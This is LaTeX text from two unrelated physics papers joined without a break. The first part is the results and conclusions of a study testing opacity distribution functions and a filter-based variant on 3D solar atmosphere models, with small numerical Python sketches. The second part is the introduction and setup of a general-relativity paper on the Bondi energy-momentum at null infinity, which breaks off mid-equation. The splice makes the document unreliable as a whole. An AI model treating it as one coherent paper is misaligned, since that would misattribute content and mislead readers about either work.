For applications in solar physics the UV regime is important; at the same time, the visible regime is of particular interest for stellar physicists. In order to represent both regimes we choose a $\sim$10 nm wide spectral pass-band in the UV (294.6 nm-303.4 nm) and in the visible (494.6 nm-503.4 nm). The UV filter profile corresponds to one of the filters in the Sunrise Filter Imager \citep[SuFI, see][]{2011SoPh..268...35G}, while the visible filter is similar to the SuFI filter in profile shape and width, but shifted in wavelength to the blue-green part of the visible solar spectrum. Hereafter we refer to these filter profiles as SuFI and SuFIV for convenience. All the tests performed in this paper use
these exemplary filter profiles and they are shown in Figure~\ref{figure1}.
\section{Results and discussions}
\label{results}
In this section we present the results from the numerical studies that we carried out in order to test the performance of the ODFs and FODFs methods.
Namely, we study the distribution of the errors in the spectral intensities computed using ODFs and FODFs relative to that computed using the high-resolution opacity. For this purpose we used a high-resolution wavelength grid with a resolving power of $R=500\,000$.
For the convenience of the discussions we define these relative errors as (see Sect.~\ref{fodfs-method} for definitions of the terms in the right hand sides of the equations below)
$$
e_{\textrm {ODFs}}=(f_{\textrm {HR}}-f_{\textrm {ODFs}})
/f_{\textrm {HR}}\times 100,
$$
that quantifies the accuracy of the ODFs in the rectangular filters,
$$
E_{\textrm {ODFs}}=(F_{\textrm {HR}}-F_{\textrm {ODFs}})/F_{\textrm {HR}}\times 100,
$$
that quantifies the accuracy of the ODFs in the non-rectangular filters, and
$$
E_{\textrm {FODFs}}=(F_{\textrm {HR}}-F_{\textrm {FODFs}})/F_{\textrm {HR}}\times 100,
$$
that quantifies the accuracy of the FODFs.
We calculate all three quantities for each of the vertical rays piercing the 300 G MHD cube from \citet{2020ApJ...894..140R} and analyse the resulting distributions of the errors.
We note
that we utilise the same approximation of actual velocities by the micro-turbulence for calculating intensities on the high-resolution spectral grid ($F_{\textrm {HR}}$ and $f_{\textrm {HR}}$, see Equations~(\ref{eq:f_quadr})~and~(\ref{eq:F_quadr})) as the one used for calculating intensities with the ODFs and FODFs approaches (i.e., $F_{\textrm {ODFs}}$ and $F_{\textrm {FODFs}}$). We use a micro-turbulent velocity of 0 km/s for the calculations presented in this paper, unless specified otherwise.
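All three error metrics share one form; a small helper (the function name is ours) makes the sign convention explicit, positive when the approximation underestimates the high-resolution value:

```python
def relative_error_percent(f_hr, f_approx):
    """(f_HR - f_approx) / f_HR * 100, as in e_ODFs, E_ODFs and E_FODFs."""
    return (f_hr - f_approx) / f_hr * 100.0

# An approximation 1% below the reference gives a +1% error;
# one above the reference gives a negative error.
```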
\begin{figure}
\includegraphics[scale=0.4]{f03.eps}
\includegraphics[scale=0.4]{f04.eps}
\caption{Effect of binning.
Plotted are the histograms of $e_{\textrm {ODFs}}$ with intensities computed using one, five and twenty bins in the UV pass-band (294.6 nm-303.4 nm). The Kurucz sub-binning set-up is used. Panels: (a) Histograms of errors introduced by using the GM for computing the ODFs.
(b) The same as for panel (a), but now using the AM for computing the ODFs.
}
\label{figure2}
\end{figure}
\begin{figure}
\includegraphics[scale=0.4]{f05.eps}
\includegraphics[scale=0.4]{f06.eps}
\caption{The same as Figure~\ref{figure2}, but now for the visible pass-band (494.6 nm-503.4 nm). Note that only one and five bin ODFs are considered for this pass-band.
}
\label{figure3}
\end{figure}
\subsection{Effect of binning}
\label{results:binning}
In this section we study $e_{\textrm {ODFs}}$ for various cases defined by the number of bins per filter pass-band, to understand how the number of bins affects the performance of the ODFs. In the original formulation the DFSYNTHE code uses the geometric mean (GM) for averaging the opacity in the sub-bins. To study the effect of different types of means we test both the GM and the arithmetic mean (AM) here.
In Figures~\ref{figure2} and \ref{figure3} we show the distribution of $e_{\textrm {ODFs}}$ in the UV and the visible pass-bands, respectively. The calculations are performed with the Kurucz (non-uniform twelve) sub-binning set-up. We note that for the calculation of the ODFs we need to have a sufficient number of high-resolution grid points in each of the sub-bins. While the wavelength grid in the DFSYNTHE code is sufficiently fine for splitting the UV pass-band into twenty bins, that is not the case for the visible pass-band. Therefore we do not consider the twenty-bin case in the visible pass-band.
In Table~\ref{tab:table1} we list the mean errors in each of the cases plotted in Figures~\ref{figure2}
and \ref{figure3}. We find that the maximum of the absolute mean error of the ODFs method is 1.22 \% in the UV and 0.19 \% in the visible pass-band relative to the high-spectral resolution calculations. Further, we find that in the UV, the absolute mean errors are smaller for the AM than for the GM, while in the visible case they are comparable.
The averaged opacity values computed using the AM are always larger than or equal to those computed using the GM.
Larger opacity values imply that the corresponding radiation is formed in higher layers of the atmosphere. Since the temperature decreases with height for most of the rays we consider, the AM produces lower intensities than the GM.
Therefore, in both the figures we see that the distributions that use the AM are shifted to the
positive side of the horizontal axis.
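The ordering invoked here is just the arithmetic mean-geometric mean inequality; a quick numerical check (on synthetic opacities spanning several decades, our choice) also shows how far apart the two means can be:

```python
import numpy as np

# Synthetic opacities spanning five decades (log-uniform draw).
kappa = 10.0 ** np.random.default_rng(3).uniform(-2.0, 3.0, 500)
am = kappa.mean()                       # arithmetic mean
gm = np.exp(np.log(kappa).mean())       # geometric mean
# AM >= GM always; for log-uniformly distributed opacities the AM is
# dominated by the few largest values, while the GM tracks the typical value.
```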
In order to represent both types of means, hereafter we use the GM for the UV pass-band and the AM for the visible pass-band.
A crucial observation one can make here is that the calculations with one bin are basically as accurate as those with a larger number of bins for both
the UV and the visible pass-bands.
In other words, the intensity computed using 240 (60) frequencies in the UV (visible) is as good as the intensity with twelve frequencies in a spectral pass-band of $\sim$ 10 nm. Thus, we conclude that in narrow spectral pass-bands,
it is sufficient to consider just one bin to reach the intrinsic accuracy of the ODFs method.
Hereafter we continue our studies with one bin per filter unless stated otherwise. The effect of binning on broader spectral pass-bands (i.e., on those where either the Planck function or the continuum opacity substantially changes within the filter) is reserved for future studies.
\subsection{Effect of sub-binning}
\label{results:subbinning}
We now proceed to study $e_{\textrm {ODFs}}$ for various sub-bin configurations to understand the effect of sub-binning.
We note that our goal is not to find an optimal sub-bin configuration as was done by \citet[][]{2019A&A...627A.157C} for 1D spectral synthesis.
Instead we only study a few examples
to demonstrate the effect the sub-binning has on the calculations of the spectral intensities emerging from 3D atmospheres.
In Figure~\ref{figure4} we show the distribution of $e_{\textrm {ODFs}}$ for various cases listed in Table~\ref{tab:table2}.
The different sub-binning configurations we consider are twelve non-uniformly distributed sub-bins as proposed and used by Kurucz, four non-uniformly distributed sub-bins (see below),
and twelve, eight and four uniformly distributed sub-bins. As already discussed in Section~\ref{fodfs-method}, the non-uniform sub-bins should have a coarser division near lower values of opacity and a finer division near the larger values. The configurations using four non-uniform sub-bins are chosen from the study of \citet[][]{2019A&A...627A.157C} (their best configuration at 300 nm, 500 nm and 503 nm). Two of these configurations used in the visible pass-band have a finer division near large opacity values (purple and black lines in Figure~\ref{figure4}b) than the one used in the UV (purple lines in Figure~\ref{figure4}a).
In the UV (Figure~\ref{figure4}a) we observe a two-peak distribution of $e_{\textrm {ODFs}}$.
The peak near zero is highest for Kurucz sub-binning whereas for the uniform sub-binning cases the highest peak appears at larger errors. In the visible pass-band (Figure~\ref{figure4}b) we see a single peak for all the cases. Here the performance of two sub-binning configurations from \citet[][]{2019A&A...627A.157C} comes very close to that of the Kurucz sub-binning.
For both the UV and the visible pass-bands the performance of the ODFs method deteriorates as the number of sub-bins used in the uniform sub-binning cases decreases. This is because it leads to coarser division of the sub-bins near the larger opacity values. Among all the various cases the Kurucz sub-binning case performs the best in both the UV and the visible pass-bands.
These examples, computed on a large number of atmospheric structures, re-affirm the findings of \citet[][]{2019A&A...627A.157C} that the accuracy of the ODFs is sensitive to the non-uniformity of the sub-bins, in particular near larger opacity values.
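To make the role of the sub-bin division concrete, the following sketch builds the step representation of a single ODF bin from a high-resolution opacity sample. It is only an illustration of the principle, not the MPS-ATLAS implementation, and the sub-bin fractions shown are hypothetical stand-ins for the actual Kurucz sizes listed in Table~\ref{tab:table2}.

```python
import numpy as np

def odf_step_values(kappa, sub_bin_fracs):
    """Represent one ODF bin by step values: sort the high-resolution
    opacities and average them over each sub-bin of the sorted axis."""
    k = np.sort(np.asarray(kappa, dtype=float))
    edges = np.concatenate(([0.0], np.cumsum(sub_bin_fracs)))
    idx = np.rint(edges * len(k)).astype(int)
    return np.array([k[a:b].mean() for a, b in zip(idx[:-1], idx[1:])])

# Illustrative twelve non-uniform fractions: coarse at low opacity,
# fine at high opacity (hypothetical values, not the actual Kurucz sizes).
fracs = np.array([0.2, 0.2, 0.2, 0.1, 0.1, 0.1,
                  0.05, 0.02, 0.01, 0.01, 0.005, 0.005])
```

By construction the step values are monotone in opacity, and the sub-bin-weighted mean of the steps reproduces the mean opacity of the bin.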
\begin{figure}
\includegraphics[scale=0.4]{f07.eps}
\includegraphics[scale=0.4]{f08.eps}
\caption{Effect of sub-binning when using a single bin to compute the ODFs for the two considered spectral pass-bands.
Plotted are the histograms of $e_{\textrm {ODFs}}$ for one bin and various combinations of the sub-bin sizes $s_j$ listed in Table~\ref{tab:table2}. Panels: (a) The UV pass-band. (b) The visible pass-band.
}
\label{figure4}
\end{figure}
\subsection{Performance of FODFs}
\label{result:fodfs_performance}
In this section we study the performance of the FODFs method for computing intensities passing through non-rectangular filters. For this purpose we use the filter profiles SuFI and SuFIV (see their description at the end of Section~\ref{1.5D-RT}).
In Figure~\ref{figure5} we show the distributions of $e_{\textrm {ODFs}}$, $E_{\textrm {ODFs}}$ and
$E_{\textrm {FODFs}}$ in the UV and the visible pass-bands. The $e_{\textrm {ODFs}}$ and $E_{\textrm {FODFs}}$ distributions look very similar in general. Their respective mean values are also similar: in the UV pass-band they are -1.2\% and -1.4\%, while in the visible pass-band they are 0.19\% and 0.14\%.
This implies that the performance of the FODFs method for intensities passing through non-rectangular filters is as good as that of the traditional ODFs method for intensities passing through rectangular filters. This is not surprising, since the entire idea of the FODFs method is to mimic the performance of the ODFs method for non-rectangular filters. Indeed, the FODFs method essentially boils down to the ODFs method performed on a modified frequency grid (see Equation~\ref{eq:tilda} and the discussion in Section~\ref{fodfs-method}). The means of the $E_{\textrm {ODFs}}$ distribution in the UV and the visible pass-bands are -4.6\% and -0.56\%, respectively. It is clear from Figure~\ref{figure5} (blue and red curves) that the FODFs method performs better than the ODFs method for the computation of intensities passing through non-rectangular filters.
One way to improve the performance of the ODFs method for calculating intensities through the non-rectangular filters is to increase the number of bins in the pass-band of the filter. For a sufficiently large number of bins, one can neglect the change of the transmission function within the bin and the $F_{\textrm {ODFs}}$ becomes a good approximation of the $F_{\textrm{HR}}$. An example of the improved performance of ODFs is demonstrated in Figure~\ref{figure55} where we show $E_{\textrm {ODFs}}$ computed using five bins and compare them with
$E_{\textrm {FODFs}}$ computed using one bin.
The means of the $E_{\textrm {ODFs}}$ ($E_{\textrm {FODFs}}$) distributions in the SuFI and the SuFIV filters are now -1.9\% (-1.4\%) and -0.16\% (-0.14\%), respectively. This shows that the performance of the ODFs method indeed improves (compare the blue lines in Figures \ref{figure5} and \ref{figure55}) and almost reaches that of the FODFs method (although it is still slightly worse).
However, this implies that the RT calculations have to be performed on a five times larger number of frequencies, which increases the computational cost fivefold. The FODFs method is free of this shortcoming and is thus five times faster than the traditional ODFs method.
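The change-of-variable idea behind the FODFs method can be sketched as follows: the filter transmission plays the role of the frequency measure along the sorted-opacity axis. This is a schematic illustration under our own simplifying assumptions, not the MPS-ATLAS implementation; for a rectangular (constant) transmission it reduces to ordinary ODF sub-binning.

```python
import numpy as np

def fodf_step_values(kappa, transmission, sub_bin_fracs):
    """Schematic FODF for one bin: sort the opacities, but measure
    position along the sorted axis with the filter transmission
    acting as the frequency measure (the change of variable nu -> nu~)."""
    order = np.argsort(kappa)
    k = np.asarray(kappa, dtype=float)[order]
    w = np.asarray(transmission, dtype=float)[order]
    cdf = np.cumsum(w) / np.sum(w)     # transmission-weighted position
    cdf[-1] = 1.0                      # guard against rounding
    edges = np.concatenate(([0.0], np.cumsum(sub_bin_fracs)))
    edges[-1] = 1.0
    steps = []
    for a, b in zip(edges[:-1], edges[1:]):
        sel = (cdf > a) & (cdf <= b)
        steps.append(np.average(k[sel], weights=w[sel]))
    return np.array(steps)
```

As in the ordinary ODF case, the step values are monotone in opacity; only the measure assigning spectral weight to each sorted frequency point has changed.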
In Figures~\ref{map-flux-HR-fodf-sufi}
and \ref{map-flux-HR-fodf-visible} we show the images of the emergent spectral intensities for the entire 300 G cube in the UV and the visible pass-bands, respectively. Each figure shows the intensities computed in the high-spectral-resolution case and with the FODFs method. These figures demonstrate that the FODFs method is accurate enough to reproduce the important spatial structuring visible in the intensity images.
To visualize the error distribution
we show the images of the $E_{\textrm {FODFs}}$ in Figure~\ref{map-err-HR-fodf} for the UV and the visible pass-bands. A comparison of the images of intensities in Figures~\ref{map-flux-HR-fodf-sufi}
and \ref{map-flux-HR-fodf-visible} with the error maps in Figure~\ref{map-err-HR-fodf} reveals a striking structural correlation in the UV, while in the visible pass-band the correlation is weak.
In the UV pass-band the magnitude of the errors is higher in the brighter granular structures and lower in the darker inter-granular structures, while in the visible pass-band the errors are nearly uniform. In particular, in the UV pass-band individual errors can be as large as -6.5\%.
We note that a detailed study of the source of these individual large errors is beyond the scope of this paper.
However, as already discussed above, the mean errors are much smaller, because the large individual errors occur only at certain grid points and do not dominate the distribution.
\begin{figure}
\includegraphics[scale=0.4]{f09.eps}
\includegraphics[scale=0.4]{f10.eps}
\caption{Performance of FODFs. Plotted are the histograms of $e_{\textrm {ODFs}}$, $E_{\textrm {ODFs}}$ and $E_{\textrm {FODFs}}$ for the one-bin set-up with the Kurucz sub-binning. Panels: (a) The SuFI filter. (b) The SuFIV filter.
}
\label{figure5}
\end{figure}
\begin{figure}
\includegraphics[scale=0.4]{f11.eps}
\includegraphics[scale=0.4]{f12.eps}
\caption{Performance of FODFs. Plotted are the histograms of $E_{\textrm {ODFs}}$ for the five-bins set-up and $E_{\textrm {FODFs}}$ for the one-bin set-up with the Kurucz sub-binning. Panels: (a) The SuFI filter. (b) The SuFIV filter.
}
\label{figure55}
\end{figure}
\begin{figure}
\includegraphics[scale=0.55]{f13.eps}
\includegraphics[scale=0.55]{f14.eps}
\caption{Images of the spectral intensities seen through the SuFI filter for the one-bin set-up with the Kurucz sub-binning. Panels: (a) High-spectral-resolution intensity. (b) Intensity computed using the FODFs method.
}
\label{map-flux-HR-fodf-sufi}
\end{figure}
\begin{figure}
\includegraphics[scale=0.55]{f15.eps}
\includegraphics[scale=0.55]{f16.eps}
\caption{Images of the spectral intensities seen through the SuFIV filter for the one-bin set-up with the Kurucz sub-binning. Panels: (a) High-spectral-resolution intensity. (b) Intensity computed using the FODFs method.
}
\label{map-flux-HR-fodf-visible}
\end{figure}
\begin{figure}
\includegraphics[scale=0.55]{f17.eps}
\includegraphics[scale=0.55]{f18.eps}
\caption{Images of $E_{\textrm {FODFs}}$ for intensities computed using the one-bin set-up with the Kurucz sub-binning. Panels: (a) The SuFI filter. (b) The SuFIV filter.
}
\label{map-err-HR-fodf}
\end{figure}
\begin{figure}
\includegraphics[scale=0.4]{f19.eps}
\includegraphics[scale=0.4]{f20.eps}
\caption{Effect of the micro-turbulent velocity ${\rm{v}}$. Plotted are the histograms of $E_{\textrm {FODFs}}$ for the one-bin set-up and the Kurucz sub-binning with ${\rm{v}}$ values of 0 and 2 km/s. Panels: (a) The SuFI filter. (b) The SuFIV filter.
}
\label{figure5AB}
\end{figure}
Since the main goal of this paper is to validate the FODFs method against the high-resolution solutions and the solutions obtained with ODFs, in all studies up to this point we simply set the micro-turbulent velocity to 0 km/s as an example. In Figure~\ref{figure5AB} we illustrate the effect of the micro-turbulent velocity ${\rm{v}}$ on the distributions of $E_{\textrm {FODFs}}$ in the UV and the visible pass-bands, comparing ${\rm{v}}$ values of 0 km/s and 2 km/s. The respective mean values of $E_{\textrm {FODFs}}$ for ${\rm{v}}=$ 0 km/s and 2 km/s are -1.4 \% and -1.25 \% in the UV pass-band, while in the visible pass-band they are 0.14 \% and 0.23 \%. Thus the use of a non-zero micro-turbulent velocity leads to slightly smaller errors in the UV and slightly larger errors in the visible pass-band.
\subsection{Center-to-limb Variation}
\label{clv}
In the previous sections we only considered the radiation along vertical rays. In this section we consider rays at nine inclinations equally spaced in $\mu$ between $\mu=0.2$ and 1, where $\mu=\cos \theta$ and $\theta$ is the angle between the ray and the normal vector. For each of the rays we spatially average the emergent spectral intensities. We show this center-to-limb variation of the spatially averaged intensities passing through the SuFI and the SuFIV filters in the top panels of Figure~\ref{figure9}. The two curves in each of these panels are computed with high-spectral resolution and with the FODFs method. In the bottom panels we plot the $E_{\textrm {FODFs}}$ between the two intensities plotted in the top panels.
Figure~\ref{figure9} shows that the absolute relative errors of the intensity values are below 1.4\% in the SuFI filter and below 0.19\% in the SuFIV filter. An accurate calculation of the center-to-limb intensity variation is essential for the characterization of exoplanets from transit light curves. We note that transit light curves do not depend on a constant offset in the intensity values (i.e., an error independent of $\mu$), so that only the change of the error with $\mu$ affects exoplanet characterization. The errors introduced by the use of FODFs show a rather weak dependence on $\mu$: in the SuFI filter the absolute relative error increases towards the disk centre, while in the SuFIV filter it decreases towards the disk centre. The change in the error in Figure~\ref{figure9} between $\mu=0.2$ and $\mu=1$ is only 0.36 \% in the SuFI filter and 0.018 \% in the SuFIV filter.
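The statement that only the $\mu$-variation of the error matters for transit shapes can be made concrete with a toy example (all numbers here are hypothetical and are not the values plotted in Figure~\ref{figure9}):

```python
import numpy as np

mu = np.linspace(0.2, 1.0, 9)            # the nine inclinations used here
I_hr = 1.0 - 0.6 * (1.0 - mu)            # toy linear limb-darkening law
I_fodf = I_hr * (1.0 + 0.01 * mu)        # toy error growing towards disk centre
E = 100.0 * (I_fodf / I_hr - 1.0)        # relative error in percent
offset = E.mean()                        # a constant offset: harmless for transits
variation = E.max() - E.min()            # this is what distorts a transit shape
```

In this toy case the error ranges from 0.2\% at the limb to 1\% at disk centre, so only the 0.8\% spread (not the mean offset) would propagate into the shape of a transit light curve.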
\begin{figure}
\includegraphics[scale=0.4]{f21.eps}
\includegraphics[scale=0.4]{f22.eps}
\caption{In the top panels we plot the center-to-limb variation of the spatially averaged emergent spectral intensities computed using high-spectral resolution (solid lines) and the FODFs method (dotted lines) through non-rectangular filters, while in the bottom panels the corresponding $E_{\textrm {FODFs}}$ are plotted. These calculations correspond to one-bin set-up with Kurucz sub-binning. Panels: (a) The SuFI filter. (b) The SuFIV filter.
}
\label{figure9}
\end{figure}
\section{Conclusions}
\label{conclusions}
In this paper we have tested the performance of the ODFs method for calculating spectral intensities emerging from 3D cubes representing solar atmospheres. We have shown that ODFs return accurate values of the intensities and their centre-to-limb variations. We have also demonstrated that sub-bin configurations found to perform well for simple 1D models also work well in the 3D case.
Furthermore, we have generalised the ODFs concept to the calculation of intensities in narrow-band non-rectangular filters, introducing filter-ODFs, or FODFs. We recall that by narrow-band filters we mean filters narrow enough that neither the continuum opacity nor the Planck function changes noticeably within the pass-band. We further recall that a rectangular filter is one that vanishes outside a given spectral pass-band and is constant within it.
We have implemented this method in the MPS-ATLAS code and tested it rigorously.
By construction, the FODFs method is identical to the traditional ODFs method up to a change of integration variable.
The main advantage of the FODFs method is that the intensities in narrow-band non-rectangular filters can be computed in just one wavelength bin (or interval) with the intrinsic accuracy of the traditional ODFs method in rectangular filters. We analyzed our FODFs method using two non-rectangular filters (one in the UV and one in the visible pass-band). In both cases the FODFs method performs excellently. Owing to its speed and accuracy, the method is applicable to studies of stellar variability, exoplanet detection and characterization, and population synthesis of stars in galaxies.
As next steps we would like to extend our studies to broader spectral pass-bands and test the performance of the method for stars with various effective temperatures. In particular, we will determine the optimal set-ups of FODFs for calculating intensities in pass-bands routinely used in ground-based photometry (e.g. the Str\"omgren and Johnson-Morgan pass-bands) as well as in space-borne photometry (e.g., the pass-bands of the {\it {Kepler}}, TESS, CHEOPS, and Gaia telescopes).
We expect that our method will be useful for a broad range of applications demanding calculations of intensity in spectral pass-bands, e.g. stellar colours, photometric variability of the Sun and stars, stellar limb darkening in pass-bands of transit-photometry telescopes (which is crucial for the determination of exoplanet radii), etc. At the same time our approach is not suitable for the synthesis of the individual line profiles.
\acknowledgements{The research leading to this paper has received funding from the European Research Council under the European Union’s Horizon 2020 research and innovation program (grant agreement No. 715947). It also received financial support from the BK21 plus program through the National Research Foundation (NRF) funded by the Ministry of Education of Korea. The computational resources were provided by the German Data Center for SDO through
grant 50OL1701 from the German Aerospace Center (DLR).
This work was partially supported from ERC Synergy Grant WHOLE SUN 810218.}
\label{sec:introduction}
One of the main achievements in the theoretical development of Einstein's theory of gravity was the discovery that a gravitating system may lose energy through the emission of gravitational waves. The famous ``mass-loss formula'' was derived by H.~Bondi and his group in 1962~\cite{Bondi:1962} in the axisymmetric case and shortly after by R.~Sachs in the general case~\cite{Sachs:1962a}. The main consequence of the mass-loss formula is the proof that --- provided that Einstein's theory is correct --- gravitational waves must exist, nowadays an experimentally well established fact~\cite{Abbott:2016,Abbott:2016a,Abbott:2017,Abbott:2017a}.
The mass-loss formula involves two quantities, the energy flux due to gravitational waves and the total mass of the system in question. By their very nature these quantities are defined at infinity where the global properties of a space-time reside. The energy flux measures the intensity of the gravitational radiation carried by the waves in each direction away from the system at each instant of time. The total mass of the system depends on time and is computed by a surface integral of the mass aspect over the sphere of all outgoing directions at an instant of retarded time.
Obviously, the Bondi mass and the gravitational flux are crucially important quantities describing --- at least in part --- a gravitationally active system. However, it is not straightforward to ``measure'' these quantities. Clearly, the description above implies that the Bondi mass is a global quantity which resides at infinity. But things are even more complicated. The Bondi mass is computed from the components of the Bondi-Sachs energy-momentum, a 4-covector defined on a cut of null infinity. Physically speaking, a cut is the idealised spherical surface of instants in retarded time when observers distributed in all directions at infinite distance from the system measure the gravitational wave signal. This information provides the so called \emph{mass-aspect} on the cut and the Bondi-Sachs 4-momentum is obtained by integrating the mass-aspect against four functions defined on the cut which can be interpreted in some sense as translations. This is in line with the fact that energy and momentum are associated in physics with translational symmetries~\cite{Ashtekar:1981}.
In the mathematical treatment of the situation there is some gauge freedom in the description of null infinity and in all discussions of the Bondi energy-momentum this freedom was used to simplify the description as much as possible. The freedom in the description consists of essentially three types, the choice of coordinates, the choice of a frame and the choice of a conformal factor, when the approach is based on Penrose's conformal treatment of asymptotically flat space-times~\cite{Penrose:1965}. When these simplifying choices are made then the resulting formulae for the Bondi energy-momentum are deceptively simple. However, when one approaches null infinity in a way which is not in line with these simplifying assumptions then the simple formulae are no longer valid. But this is exactly the situation which one is facing when space-times are computed numerically using codes which are capable of reaching null infinity in finite time such as the codes based on the characteristic formulations of the Einstein equations \cite{Bishop:1997,Winicour:2001} or the conformal field equations~\cite{Hubner:1996a,Hubner:2001a,Frauendiener:1998,Frauendiener:1998a,Frauendiener:2002c,Frauendiener:2004}. In these cases, the gauge is dictated by the formulation of the equations which makes the numerical treatment as well-behaved as possible and this is, in general, not the same as the choices needed for simplifying the treatment of null infinity.
In this paper we give a prescription for the determination of the Bondi energy-momentum in a general gauge. This is an important task not only because of the physical relevance of the Bondi mass but also because the Bondi-Sachs mass-loss formula is a very good test for the validity of a numerical code.
The outline of the paper is as follows. In sec.~\ref{sec:asympt-flatn-struct} we collect the necessary facts about null infinity following the standard sources such as e.g.~\cite{Penrose:1986,Frauendiener:2004a,Geroch:1977,ValienteKroon:2016}. Sec.~\ref{sec:conf-ghp-form} is devoted to the introduction of a manifestly conformally invariant formalism based on conformal densities. This formalism is an extension of the more familiar GHP formalism~\cite{Geroch:1973b,Penrose:1984a}. It is used in sec.~\ref{sec:cut-systems-null} and \ref{sec:bms-algebra} to study the structure of cut systems of $\mathscr{I}$ and of the BMS algebra and, in particular, to derive and characterize the ideal of asymptotic translations in sec.~\ref{sec:lorentz-metric-space}. Finally, in sec.~\ref{sec:mass-aspect} we discuss the Bondi energy-momentum and prove (again) the mass-loss formula for gravitational radiation in asymptotically flat space-times in sec.~\ref{sec:mass-loss-formula}. We finish the paper with a brief description of how one would use the formulae obtained earlier to compute the Bondi energy-momentum in a space-time for which null infinity is not presented in a Bondi gauge.
We use the same conventions and notation as~\cite{Penrose:1986} throughout.
\section{Asymptotic flatness and the structure of null infinity}
\label{sec:asympt-flatn-struct}
In this section we will briefly outline the specific assumptions that are made in the definition of the Bondi energy-momentum. We describe this not from a point of view within the physical space-time but from within a conformally related space-time. We are interested here in an asymptotically flat space-time $(\widetilde{M},\tilde{g}_{ab})$. By definition, this means that we may regard $\widetilde{M}$ as embedded into a larger `unphysical' space-time $(M,g_{ab})$ where the metrics are related on $\widetilde{M}$ by
\begin{equation}
\label{eq:1}
g_{ab} = \Omega^2\tilde{g}_{ab}
\end{equation}
for a function $\Omega:M\to{\mathbb {R}}$ with $\Omega(x)>0$ if and only if $x\in\widetilde{M}$. We denote the zero-set of $\Omega$ by $\mathscr{I}$, usually called \emph{null infinity}, and assume that it is a regular submanifold of $M$ so that $\mathscr{I}=\{x \in M : \Omega(x)=0, \mathrm{d}\Omega(x) \ne0\}$. Notice, that the conformal factor $\Omega$ is not unique, any function $\widehat\Omega=\Omega\Theta$ with $\Theta>0$ on $\widetilde{M}\cup\mathscr{I}$ together with the metric $\hat{g}_{ab}=\Theta^2 g_{ab}$ satisfies the same conditions. We assume that $\mathscr{I}$ has two connected components $\mathscr{I}=\mathscr{I}^+ \cup \mathscr{I}^-$ each with the topology $S^2\times {\mathbb {R}}$, see~\cite{Geroch:1977,Penrose:1965,Frauendiener:2004} for more details. The sets $\mathscr{I}^\pm$ are called \emph{future} and \emph{past null infinity}. In what follows we will implicitly assume that $\mathscr{I}$ refers to $\mathscr{I}^+$. Similar considerations hold for $\mathscr{I}^-$.
The curvature tensors of the two metrics differ by terms containing derivatives of the conformal factor $\Omega$. The various pieces of the Riemann tensors, i.e., the Weyl tensor $C_{abc}{}^d$, the tensor $\Phi_{ab}=-\frac12 (R_{ab}- \frac14 R g_{ab})$, defined in terms of the Ricci tensor $R_{ab}$, and the curvature scalar $\Lambda=\frac1{24}R$, are related on $\widetilde{M}$ according to the formulae
\begin{equation}
\label{eq:2}
\begin{aligned}
\widetilde{C}_{abc}{}^d &= C_{abc}{}^d \\
\Omega\widetilde{\Phi}_{ab} &= \Omega\Phi_{ab} + \nabla_a\nabla_b\Omega - \frac14 g_{ab} \Box\Omega,\\
\tilde\Lambda &= \Omega^2\Lambda - \frac14 \Omega \Box \Omega + \frac12 \nabla_a\Omega \nabla^a\Omega.
\end{aligned}
\end{equation}
We assume that the vacuum Einstein equations hold in $\widetilde{M}$ near $\mathscr{I}$. Thus, the physical Einstein tensor $\widetilde{G}_{ab}$ vanishes and so does the physical Ricci tensor $\widetilde{R}_{ab}$. Hence, the equations
\begin{equation}
\label{eq:3}
\begin{aligned}
0 &= \Omega\Phi_{ab} + \nabla_a\nabla_b\Omega - \frac14 g_{ab} \Box\Omega,\\
0 &= \Omega^2\Lambda - \frac14 \Omega \Box \Omega + \frac12 \nabla_a\Omega \nabla^a\Omega
\end{aligned}
\end{equation}
hold on $\widetilde{M}$. Since all geometric quantities are smooth these equations extend smoothly to $\mathscr{I}$ and we can write them in the form
\begin{align}
\nabla_a\nabla_b\Omega - \frac14 g_{ab} \Box\Omega &= \mathcal{O}(\Omega), \label{eq:4}\\
\nabla_a\Omega \nabla^a\Omega &= \mathcal{O}(\Omega).\label{eq:5}
\end{align}
The first of these equations is termed the \emph{asymptotic Einstein condition} in~\cite{Penrose:1986}, while the second shows that $\mathscr{I}$ is a regular null hyper-surface. A fundamental consequence of this construction is that the Weyl tensor vanishes on $\mathscr{I}$. This allows us to introduce the rescaled Weyl quantities $\psi_i=\Omega^{-1}\Psi_i$ for $i=0,\dots,4$, smooth complex-valued functions on $M$, where the $\Psi_i$ are the components of $C_{abc}{}^d$ with respect to the null tetrad. For their definition, as well as for the definitions of all the spin-coefficients, we refer to~\cite{Penrose:1984a}.
As the next step we collect all the relevant equations on $\mathscr{I}$. We write them down with respect to a null tetrad chosen as follows. The metric $g_{ab}$, when restricted to $\mathscr{I}$, is degenerate, i.e., at every point of $\mathscr{I}$ there is a 1-dimensional subspace of tangent vectors which annihilate the metric. Let $n^a$ be a non-zero vector in that subspace. We complement it by a complex null vector $m^a$ and an additional real null vector $l^a$ to a null tetrad $(n^a,m^a,\overline{m}^a,l^a)$ for $M$ at every point on $\mathscr{I}$. The dual (co-vector) basis is $(l_a,-\overline{m}_a,-m_a,n_a)$. In most of what follows we will be concerned only with quantities which are intrinsic to $\mathscr{I}$. The corresponding basis and dual basis intrinsic to $\mathscr{I}$ are obtained by dropping the last members of the 4-dimensional bases.
To simplify things and in view of later discussions we now assume the existence of a scalar function $s:\mathscr{I}\to{\mathbb {R}}$ with the property that $D's=n^a\nabla_as\ne0$ everywhere and we assume that the complex null vector $m^a$ has been chosen so that $\delta s = m^a\nabla_a s=0$. Then, the level sets of constant $s$ are ``cuts'' of $\mathscr{I}$, i.e., 2-dimensional surfaces everywhere transverse to its null generators, i.e., the integral curves to $n^a$.
With this setup we are now in a position to introduce the GHP-formalism~\cite{Geroch:1973b,Penrose:1984a} and, in particular, the operators $\thorn'$, $\eth$ and $\etp$ acting in the directions of the basis vectors tangent to $\mathscr{I}$.
The gradient of the conformal factor $\Omega$ on $M$ defines a vector field\footnote{Note, that the sign makes the vector future-pointing on $\mathscr{I}^+$. On $\mathscr{I}^-$ one would have a different sign.} $N^a:=-g^{ab}\nabla_b\Omega$ which, when restricted to $\mathscr{I}$ is null, i.e., such that $N^a=An^a$ for some scalar $A$ on $\mathscr{I}$. When the conformal factor is changed by a rescaling $\Omega \mapsto \Theta \Omega$ then both $g_{ab}$ and $N^a$ are changed, $g_{ab} \mapsto \Theta^2\,g_{ab}$ and $N^a\mapsto \Theta^{-1}N^a$, but the tensor
\begin{equation}
\Gamma_{ab}{}^{cd} := g_{ab} N^cN^d\label{eq:6}
\end{equation}
